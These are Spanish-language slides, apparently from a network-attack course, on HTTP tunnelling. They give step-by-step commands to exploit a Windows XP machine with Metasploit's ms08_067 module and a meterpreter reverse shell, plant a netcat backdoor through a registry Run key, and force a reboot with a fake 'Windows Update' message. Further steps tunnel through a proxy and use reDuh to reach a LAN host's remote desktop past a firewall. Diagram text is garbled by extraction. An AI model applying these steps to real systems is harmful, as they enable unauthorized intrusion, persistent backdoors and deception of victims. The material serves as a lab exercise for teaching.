Anda di halaman 1dari 16

ATAQUE A REDES

CAPITULO 4, SESIN 10

HTTP TUNELLING
HACKER
NO ETICO

PROXY

IN
CO

RR

ATAQUE
ATAQUE

OXY
CON EXIN AL PR

E CT
O

VICTIMA

Preparativos
Diagramar ejercicio
Instalar backdoor en vctima
Configurar proxy
Acceder al ataque

Instalar backdoor en vctima


(Win XP)
Explote el sistema com metaesploit
use

exploit/windows/smb/ms08_067_netapi
set LHOST IP_BACK_TRACK
set RHOST IP_VICTIMA
set PAYLOAD
windows/meterpreter/reverse_tcp
exploit

Instalar el backdoor en vctima (Win


XP)II
Suba el netcat a la victima
upload /pentest/windows-binaries/tools/nc.exe .

Ahora cree en el registro de Windows la ejecucin

automtica.
En meterpreter escriba shell
shell

Ahora en el prompt escriba:


reg add

hklm\software\microsoft\windows\currentversion\run /
v cmd /t reg_sz /d c:\windows\system32\ps4.exe

Instalar el backdoor en vctima (Win


XP) III
Ahora reiniciamos el sistema de la

vctima de una manera elegante para


que surta efecto nuestro backdoor.
Escriba en el shell de windows:
shutdown /t 60 /r /f /c "Windows Update

ha terminado de actualizar el sistema. Se


va a reiniciar el equipo para que cojan
efecto los cambios"

Atacar II
Desde su Windows XP HOST descarguese el

nc.exe desde el backTrack


En backTrack
cp /pentest/windows-binaries/tools/nc.exe

/var/www
/etc/init.d.apache2 start
En Windows abra el navegador y escriba
http://IPDELBACKTRACK/nc.exe

Guardelo en C:

Configurar el PROXY

Abra el archivo de configuracin:


/etc/tinyproxy/tinyproxy.conf
nano /etc/tinyproxy/tinyproxy.conf

Y edite los tres parmetros de abajo as:


Allow IP_DE_SU_RED/MASCARA
#ConnectPort 443
#ConnectPort 563

Es decir comente los dos connectPort y en el allow

ponga por ejemplo:


Allow 192.168.11.0/24

Luego aplique:

service network restart

Atacar II
Vaya a la consola de Windows XP HOST
vaya al C:
escriba:
nc.exe nvv PROXY 8888

Ejemplo
nc 192.168.9.175 8888

Escriba ahora:
CONNECT IPVICTIMA:3030 HTTP/1.0

HTTP Tunneling con ReDuh

FIR

LL
A
W

www.victima.com
TCP/80
ABIERTO
CENTOS

qquuee
A
Attaa

DMZ
VICTIMA XP
TCP/3389
ABIERTO

ATACANTE
BACKTRACK
WINDOWS XP HOST
LAN

re-Duh
Crea un circuito HTTP entre una victima y el

atacante.
Pasa firewalls DMZ y llega hasta la LAN
Consiste en dos partes, una cliente y una

servidor.
El servidor es un script en .jsp o .php o .aspx

segn el servidor web de la vctima.


El cliente esta hecho en java y se corre desde la

PC del atacante.
Por medio de un puerto local el atacante conecta

su remote desktop a un tnel que lo lleva al otro

Conectarse al servidor web


victima
Requisitos: Hay que hackear el servidor

de la vctima y subirle el archivo


reDuh.xxx
El servidor de prueba ya tiene el archivo

reDuh.php
En el backTrack ir a la carpeta:
cd /pentest/COMBAT/reDuhClient

Ejecute la siguiente linea:


java -jar reDuhClient.jar

http://IPSERVIDORWEB/reDuh.php

Conectarse a la interfaz del


reDuh
Desde otra consola del BackTrack abra
telnet localhost 1010

Dentro de la consola del reDuh, creamos

el tunel
>>[createTunnel]1234:IPVICTIMALAN:338

9
Una vez echo esto se crea el tunnel y ya

podemos conectarnos desde nuestra PC


de ataque.

Conectarse mediante el Tunnel


En el Windows Xp HOST
Abrir Conexin a escritorio remoto
Poner la IP del Backtrack y el puerto

1234, as:

Desconectar el Tunnel
EN la consola del reDuh en BackTrack

ponemos:
>>[killReDuh]

Enlaces
http://www.sensepost.com/labs/tools/pent

est/reduh

Anda mungkin juga menyukai